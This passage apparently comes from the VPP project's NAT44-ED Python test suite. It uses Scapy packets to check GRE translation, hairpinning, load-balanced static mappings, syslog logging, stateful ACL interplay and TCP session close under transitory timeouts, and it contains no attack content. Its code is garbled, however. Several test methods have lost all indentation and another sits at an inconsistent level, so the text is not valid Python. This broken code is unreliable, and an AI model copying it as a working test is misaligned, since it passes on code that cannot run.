        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        p = self.pg1.get_capture(1)
        # GRE packet from the same inside host towards the outside
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             GRE() /
             IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
             TCP(sport=1234, dport=1234))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        p = self.pg1.get_capture(1)
        packet = p[0]
        try:
            # outer source translated to the pool address, GRE layer kept
            self.assertEqual(packet[IP].src, self.nat_addr)
            self.assertEqual(packet[IP].dst, self.pg1.remote_ip4)
            self.assertEqual(packet.haslayer(GRE), 1)
            self.assert_packet_checksums_valid(packet)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", packet))
            raise
        # out2in
        # GRE reply addressed to the pool address
        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             GRE() /
             IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
             TCP(sport=1234, dport=1234))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        p = self.pg0.get_capture(1)
        packet = p[0]
        try:
            # destination translated back to the inside host, GRE kept
            self.assertEqual(packet[IP].src, self.pg1.remote_ip4)
            self.assertEqual(packet[IP].dst, self.pg0.remote_ip4)
            self.assertEqual(packet.haslayer(GRE), 1)
            self.assert_packet_checksums_valid(packet)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", packet))
            raise
    def test_hairpinning_unknown_proto(self):
        """ NAT44ED translate packet with unknown protocol - hairpinning """
        host = self.pg0.remote_hosts[0]
        server = self.pg0.remote_hosts[1]
        host_in_port = 1234
        server_out_port = 8765
        server_nat_ip = "10.0.0.11"
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # add static mapping for server
        self.nat_add_static_mapping(server.ip4, server_nat_ip)
        # host to server
        # NOTE(review): the TCP packet is sent first, presumably to
        # create hairpin NAT state before the port-less GRE packet — confirm
        p = (Ether(src=host.mac, dst=self.pg0.local_mac) /
             IP(src=host.ip4, dst=server_nat_ip) /
             TCP(sport=host_in_port, dport=server_out_port))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg0.get_capture(1)
        # GRE packet from host towards the server's NAT address
        p = (Ether(dst=self.pg0.local_mac, src=host.mac) /
             IP(src=host.ip4, dst=server_nat_ip) /
             GRE() /
             IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
             TCP(sport=1234, dport=1234))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        p = self.pg0.get_capture(1)
        packet = p[0]
        try:
            # hairpinned: source becomes the pool address, destination
            # the server's real address; GRE layer preserved
            self.assertEqual(packet[IP].src, self.nat_addr)
            self.assertEqual(packet[IP].dst, server.ip4)
            self.assertEqual(packet.haslayer(GRE), 1)
            self.assert_packet_checksums_valid(packet)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", packet))
            raise
        # server to host
        p = (Ether(dst=self.pg0.local_mac, src=server.mac) /
             IP(src=server.ip4, dst=self.nat_addr) /
             GRE() /
             IP(src=self.pg2.remote_ip4, dst=self.pg2.remote_ip4) /
             TCP(sport=1234, dport=1234))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        p = self.pg0.get_capture(1)
        packet = p[0]
        try:
            # reply: source appears as the server's NAT address,
            # destination is the host's real address
            self.assertEqual(packet[IP].src, server_nat_ip)
            self.assertEqual(packet[IP].dst, host.ip4)
            self.assertEqual(packet.haslayer(GRE), 1)
            self.assert_packet_checksums_valid(packet)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", packet))
            raise
    def test_output_feature_and_service(self):
        """ NAT44ED interface output feature and services """
        external_addr = '1.2.3.4'
        external_port = 80
        local_port = 8080
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        self.nat_add_address(self.nat_addr)
        # address-only identity mapping for the client's address
        flags = self.config_flags.NAT_IS_ADDR_ONLY
        self.vapi.nat44_add_del_identity_mapping(
            ip_address=self.pg1.remote_ip4, sw_if_index=0xFFFFFFFF,
            flags=flags, is_add=1)
        # out2in-only static mapping exposing the local service
        flags = self.config_flags.NAT_IS_OUT2IN_ONLY
        self.nat_add_static_mapping(self.pg0.remote_ip4, external_addr,
                                    local_port, external_port,
                                    proto=IP_PROTOS.tcp, flags=flags)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg0)
        # NAT applied as an output feature on pg1
        self.vapi.nat44_interface_add_del_output_feature(
            sw_if_index=self.pg1.sw_if_index, is_add=1)
        # from client to service
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=external_addr) /
             TCP(sport=12345, dport=external_port))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            # destination NAT-ed to the service's real address and port
            self.assertEqual(ip.dst, self.pg0.remote_ip4)
            self.assertEqual(tcp.dport, local_port)
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
        # from service back to client
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=local_port, dport=12345))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            # reply source rewritten to the external service identity
            self.assertEqual(ip.src, external_addr)
            self.assertEqual(tcp.sport, external_port)
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
        # from local network host to external network
        pkts = self.create_stream_in(self.pg0, self.pg1)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(len(pkts))
        self.verify_capture_out(capture, ignore_port=True)
        # NOTE(review): the in2out stream is sent twice back to back,
        # presumably to exercise both session-creation and established
        # paths — confirm the duplication is intentional
        pkts = self.create_stream_in(self.pg0, self.pg1)
        self.pg0.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(len(pkts))
        self.verify_capture_out(capture, ignore_port=True)
        # from external network back to local network host
        pkts = self.create_stream_out(self.pg1)
        self.pg1.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(len(pkts))
        self.verify_capture_in(capture, self.pg0)
    def test_output_feature_and_service3(self):
        """ NAT44ED interface output feature and DST NAT """
        external_addr = '1.2.3.4'
        external_port = 80
        local_port = 8080
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        self.nat_add_address(self.nat_addr)
        # out2in-only mapping: the service lives on pg1's remote host
        flags = self.config_flags.NAT_IS_OUT2IN_ONLY
        self.nat_add_static_mapping(self.pg1.remote_ip4, external_addr,
                                    local_port, external_port,
                                    proto=IP_PROTOS.tcp, flags=flags)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg0)
        # NAT applied as an output feature on pg1
        self.vapi.nat44_interface_add_del_output_feature(
            sw_if_index=self.pg1.sw_if_index, is_add=1)
        # inside host towards the external service address
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=external_addr) /
             TCP(sport=12345, dport=external_port))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            # only the destination is NAT-ed; the source stays intact
            self.assertEqual(ip.src, self.pg0.remote_ip4)
            self.assertEqual(tcp.sport, 12345)
            self.assertEqual(ip.dst, self.pg1.remote_ip4)
            self.assertEqual(tcp.dport, local_port)
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
        # reply from the service back to the inside host
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
             TCP(sport=local_port, dport=12345))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(1)
        p = capture[0]
        try:
            ip = p[IP]
            tcp = p[TCP]
            # reply source rewritten back to the external identity
            self.assertEqual(ip.src, external_addr)
            self.assertEqual(tcp.sport, external_port)
            self.assertEqual(ip.dst, self.pg0.remote_ip4)
            self.assertEqual(tcp.dport, 12345)
            self.assert_packet_checksums_valid(p)
        except:
            self.logger.error(ppp("Unexpected or invalid packet:", p))
            raise
def test_self_twice_nat_lb_negative(self):
""" NAT44ED Self Twice NAT local service load balancing (negative test)
"""
self.twice_nat_common(lb=True, self_twice_nat=True, same_pg=True,
client_id=2)
def test_self_twice_nat_negative(self):
""" NAT44ED Self Twice NAT (negative test) """
self.twice_nat_common(self_twice_nat=True)
def test_static_lb_multi_clients(self):
""" NAT44ED local service load balancing - multiple clients"""
external_addr = self.nat_addr
external_port = 80
local_port = 8080
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
server3 = self.pg0.remote_hosts[2]
locals = [{'addr': server1.ip4,
'port': local_port,
'probability': 90,
'vrf_id': 0},
{'addr': server2.ip4,
'port': local_port,
'probability': 10,
'vrf_id': 0}]
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
self.nat_add_address(self.nat_addr)
self.vapi.nat44_add_del_lb_static_mapping(is_add=1,
external_addr=external_addr,
external_port=external_port,
protocol=IP_PROTOS.tcp,
local_num=len(locals),
locals=locals)
server1_n = 0
server2_n = 0
clients = ip4_range(self.pg1.remote_ip4, 10, 50)
pkts = []
for client in clients:
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=client, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
pkts.append(p)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
else:
server2_n += 1
self.assertGreaterEqual(server1_n, server2_n)
local = {
'addr': server3.ip4,
'port': local_port,
'probability': 20,
'vrf_id': 0
}
# add new back-end
self.vapi.nat44_lb_static_mapping_add_del_local(
is_add=1,
external_addr=external_addr,
external_port=external_port,
local=local,
protocol=IP_PROTOS.tcp)
server1_n = 0
server2_n = 0
server3_n = 0
clients = ip4_range(self.pg1.remote_ip4, 60, 110)
pkts = []
for client in clients:
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=client, dst=self.nat_addr) /
TCP(sport=12346, dport=external_port))
pkts.append(p)
self.assertGreater(len(pkts), 0)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
elif p[IP].dst == server2.ip4:
server2_n += 1
else:
server3_n += 1
self.assertGreater(server1_n, 0)
self.assertGreater(server2_n, 0)
self.assertGreater(server3_n, 0)
local = {
'addr': server2.ip4,
'port': local_port,
'probability': 10,
'vrf_id': 0
}
# remove one back-end
self.vapi.nat44_lb_static_mapping_add_del_local(
is_add=0,
external_addr=external_addr,
external_port=external_port,
local=local,
protocol=IP_PROTOS.tcp)
server1_n = 0
server2_n = 0
server3_n = 0
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
if p[IP].dst == server1.ip4:
server1_n += 1
elif p[IP].dst == server2.ip4:
server2_n += 1
else:
server3_n += 1
self.assertGreater(server1_n, 0)
self.assertEqual(server2_n, 0)
self.assertGreater(server3_n, 0)
    def test_syslog_sess(self):
        """ NAT44ED Test syslog session creation and deletion """
        # syslog sink configured on pg3
        self.vapi.syslog_set_filter(
            self.syslog_severity.SYSLOG_API_SEVERITY_INFO)
        self.vapi.syslog_set_sender(self.pg3.local_ip4, self.pg3.remote_ip4)
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # creating a session must produce one syslog message on pg3
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=self.tcp_port_in, dport=self.tcp_external_port))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)
        # record the allocated external port (presumably consumed by
        # verify_syslog_sess — confirm)
        self.tcp_port_out = capture[0][TCP].sport
        capture = self.pg3.get_capture(1)
        self.verify_syslog_sess(capture[0][Raw].load)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        # deleting the pool address removes the session -> second message
        self.nat_add_address(self.nat_addr, is_add=0)
        capture = self.pg3.get_capture(1)
        self.verify_syslog_sess(capture[0][Raw].load, False)
def test_twice_nat_interface_addr(self):
""" NAT44ED Acquire twice NAT addresses from interface """
flags = self.config_flags.NAT_IS_TWICE_NAT
self.vapi.nat44_add_del_interface_addr(
sw_if_index=self.pg11.sw_if_index,
flags=flags, is_add=1)
# no address in NAT pool
adresses = self.vapi.nat44_address_dump()
self.assertEqual(0, len(adresses))
# configure interface address and check NAT address pool
self.pg11.config_ip4()
adresses = self.vapi.nat44_address_dump()
self.assertEqual(1, len(adresses))
self.assertEqual(str(adresses[0].ip_address),
self.pg11.local_ip4)
self.assertEqual(adresses[0].flags, flags)
# remove interface address and check NAT address pool
self.pg11.unconfig_ip4()
adresses = self.vapi.nat44_address_dump()
self.assertEqual(0, len(adresses))
    def test_output_feature_stateful_acl(self):
        """ NAT44ED output feature works with stateful ACL """
        self.nat_add_address(self.nat_addr)
        self.vapi.nat44_interface_add_del_output_feature(
            sw_if_index=self.pg1.sw_if_index, is_add=1)
        # First ensure that the NAT is working sans ACL
        # send packets out2in, no sessions yet so packets should drop
        pkts_out2in = self.create_stream_out(self.pg1)
        self.send_and_assert_no_replies(self.pg1, pkts_out2in)
        # send packets into inside intf, ensure received via outside intf
        pkts_in2out = self.create_stream_in(self.pg0, self.pg1)
        capture = self.send_and_expect(self.pg0, pkts_in2out, self.pg1,
                                       len(pkts_in2out))
        self.verify_capture_out(capture, ignore_port=True)
        # send out2in again, with sessions created it should work now
        pkts_out2in = self.create_stream_out(self.pg1)
        capture = self.send_and_expect(self.pg1, pkts_out2in, self.pg0,
                                       len(pkts_out2in))
        self.verify_capture_in(capture, self.pg0)
        # Create an ACL blocking everything
        out2in_deny_rule = AclRule(is_permit=0)
        out2in_acl = VppAcl(self, rules=[out2in_deny_rule])
        out2in_acl.add_vpp_config()
        # create an ACL to permit/reflect everything
        # (is_permit=2 is the reflective/stateful permit action)
        in2out_reflect_rule = AclRule(is_permit=2)
        in2out_acl = VppAcl(self, rules=[in2out_reflect_rule])
        in2out_acl.add_vpp_config()
        # apply as input acl on interface and confirm it blocks everything
        acl_if = VppAclInterface(self, sw_if_index=self.pg1.sw_if_index,
                                 n_input=1, acls=[out2in_acl])
        acl_if.add_vpp_config()
        self.send_and_assert_no_replies(self.pg1, pkts_out2in)
        # apply output acl
        acl_if.acls = [out2in_acl, in2out_acl]
        acl_if.add_vpp_config()
        # send in2out to generate ACL state (NAT state was created earlier)
        capture = self.send_and_expect(self.pg0, pkts_in2out, self.pg1,
                                       len(pkts_in2out))
        self.verify_capture_out(capture, ignore_port=True)
        # send out2in again. ACL state exists so it should work now.
        # TCP packets with the syn flag set also need the ack flag
        # (0x02 = SYN, 0x10 = ACK)
        for p in pkts_out2in:
            if p.haslayer(TCP) and p[TCP].flags & 0x02:
                p[TCP].flags |= 0x10
        capture = self.send_and_expect(self.pg1, pkts_out2in, self.pg0,
                                       len(pkts_out2in))
        self.verify_capture_in(capture, self.pg0)
        self.logger.info(self.vapi.cli("show trace"))
    def test_tcp_close(self):
        """ NAT44ED Close TCP session from inside network - output feature """
        # shorten only the transitory timeout; keep everything else
        old_timeouts = self.vapi.nat_get_timeouts()
        new_transitory = 2
        self.vapi.nat_set_timeouts(
            udp=old_timeouts.udp,
            tcp_established=old_timeouts.tcp_established,
            icmp=old_timeouts.icmp,
            tcp_transitory=new_transitory)
        self.vapi.nat44_forwarding_enable_disable(enable=1)
        self.nat_add_address(self.pg1.local_ip4)
        twice_nat_addr = '10.0.1.3'
        service_ip = '192.168.16.150'
        self.nat_add_address(twice_nat_addr, twice_nat=1)
        flags = self.config_flags.NAT_IS_INSIDE
        # NOTE(review): pg0 is registered twice - once without flags and
        # once with NAT_IS_INSIDE; confirm both registrations are intended
        self.vapi.nat44_interface_add_del_feature(
            sw_if_index=self.pg0.sw_if_index,
            is_add=1)
        self.vapi.nat44_interface_add_del_feature(
            sw_if_index=self.pg0.sw_if_index,
            flags=flags, is_add=1)
        self.vapi.nat44_interface_add_del_output_feature(
            is_add=1,
            sw_if_index=self.pg1.sw_if_index)
        # out2in-only twice-NAT mapping exposing the service
        flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
                 self.config_flags.NAT_IS_TWICE_NAT)
        self.nat_add_static_mapping(self.pg0.remote_ip4,
                                    service_ip, 80, 80,
                                    proto=IP_PROTOS.tcp,
                                    flags=flags)
        # baseline session count, to compare against later
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        start_sessnum = len(sessions)
        # SYN packet out->in
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=service_ip) /
             TCP(sport=33898, dport=80, flags="S"))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg0.get_capture(1)
        p = capture[0]
        # twice-NAT rewrote the client source port; remember it
        tcp_port = p[TCP].sport
        # SYN + ACK packet in->out
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
             TCP(sport=80, dport=tcp_port, flags="SA"))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        # ACK packet out->in
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=service_ip) /
             TCP(sport=33898, dport=80, flags="A"))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg0.get_capture(1)
        # FIN packet in -> out
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
             TCP(sport=80, dport=tcp_port, flags="FA", seq=100, ack=300))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        # FIN+ACK packet out -> in
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=service_ip) /
             TCP(sport=33898, dport=80, flags="FA", seq=300, ack=101))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg0.get_capture(1)
        # ACK packet in -> out
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=twice_nat_addr) /
             TCP(sport=80, dport=tcp_port, flags="A", seq=101, ack=301))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        # session now in transitory timeout
        # try SYN packet out->in - should be dropped
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=service_ip) /
             TCP(sport=33898, dport=80, flags="S"))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.sleep(new_transitory, "wait for transitory timeout")
        self.pg0.assert_nothing_captured(0)
        # session should still exist
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        self.assertEqual(len(sessions) - start_sessnum, 1)
        # send FIN+ACK packet out -> in - will cause session to be wiped
        # but won't create a new session
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=service_ip) /
             TCP(sport=33898, dport=80, flags="FA", seq=300, ack=101))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        self.assertEqual(len(sessions) - start_sessnum, 0)
        self.pg0.assert_nothing_captured(0)
    def test_tcp_session_close_in(self):
        """ NAT44ED Close TCP session from inside network """
        in_port = self.tcp_port_in
        out_port = 10505
        ext_port = self.tcp_external_port
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # twice-NAT static mapping for the inside host
        self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
                                    in_port, out_port, proto=IP_PROTOS.tcp,
                                    flags=self.config_flags.NAT_IS_TWICE_NAT)
        # baseline session count, to compare against later
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        session_n = len(sessions)
        # short transitory timeout so the closed session expires fast
        self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
                                   tcp_transitory=2, icmp=5)
        self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
        # FIN packet in -> out
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=in_port, dport=ext_port,
                 flags="FA", seq=100, ack=300))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        pkts = []
        # ACK packet out -> in
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             TCP(sport=ext_port, dport=out_port,
                 flags="A", seq=300, ack=101))
        pkts.append(p)
        # FIN packet out -> in
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             TCP(sport=ext_port, dport=out_port,
                 flags="FA", seq=300, ack=101))
        pkts.append(p)
        self.pg1.add_stream(pkts)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg0.get_capture(2)
        # ACK packet in -> out completes the close handshake
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=in_port, dport=ext_port,
                 flags="A", seq=101, ack=301))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        # the closed session still exists during its transitory timeout
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        self.assertEqual(len(sessions) - session_n, 1)
        # snapshot drop counters before the extra packets
        out2in_drops = self.get_err_counter(
            '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
        in2out_drops = self.get_err_counter(
            '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
        # extra FIN packet out -> in - this should be dropped
        p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             TCP(sport=ext_port, dport=out_port,
                 flags="FA", seq=300, ack=101))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg0.assert_nothing_captured()
        # extra ACK packet in -> out - this should be dropped
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=in_port, dport=ext_port,
                 flags="A", seq=101, ack=301))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.assert_nothing_captured()
        # each extra packet must bump its direction's drop counter by one
        stats = self.get_err_counter(
            '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
        self.assertEqual(stats - out2in_drops, 1)
        stats = self.get_err_counter(
            '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
        self.assertEqual(stats - in2out_drops, 1)
        # wait past the 2s transitory timeout
        self.sleep(3)
        # extra ACK packet in -> out - this will cause session to be wiped
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=in_port, dport=ext_port,
                 flags="A", seq=101, ack=301))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.assert_nothing_captured()
        sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
        self.assertEqual(len(sessions) - session_n, 0)
def test_tcp_session_close_out(self):
    """ NAT44ED Close TCP session from outside network """
    in_port = self.tcp_port_in
    out_port = 10505
    ext_port = self.tcp_external_port
    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)
    # static twice-NAT mapping so the outside host can reach pg0's host
    self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
                                in_port, out_port, proto=IP_PROTOS.tcp,
                                flags=self.config_flags.NAT_IS_TWICE_NAT)
    # baseline session count so the assertions below can be relative
    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    session_n = len(sessions)
    # short (2s) transitory timeout lets the closed session age out fast
    self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
                               tcp_transitory=2, icmp=5)
    _ = self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
    # FIN packet out -> in
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="FA", seq=100, ack=300))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.get_capture(1)
    # FIN+ACK packet in -> out
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="FA", seq=300, ack=101))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.get_capture(1)
    # ACK packet out -> in
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="A", seq=101, ack=301))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.get_capture(1)
    # session is closed but must still exist until the transitory timeout
    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    self.assertEqual(len(sessions) - session_n, 1)
    out2in_drops = self.get_err_counter(
        '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
    in2out_drops = self.get_err_counter(
        '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
    # extra FIN packet out -> in - this should be dropped
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="FA", seq=300, ack=101))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.assert_nothing_captured()
    # extra ACK packet in -> out - this should be dropped
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="A", seq=101, ack=301))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.assert_nothing_captured()
    # each dropped packet must bump its direction's drop counter by one
    stats = self.get_err_counter(
        '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
    self.assertEqual(stats - out2in_drops, 1)
    stats = self.get_err_counter(
        '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
    self.assertEqual(stats - in2out_drops, 1)
    # wait past the 2s transitory timeout configured above
    self.sleep(3)
    # extra ACK packet in -> out - this will cause session to be wiped
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="A", seq=101, ack=301))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.assert_nothing_captured()
    # session count must be back to the baseline
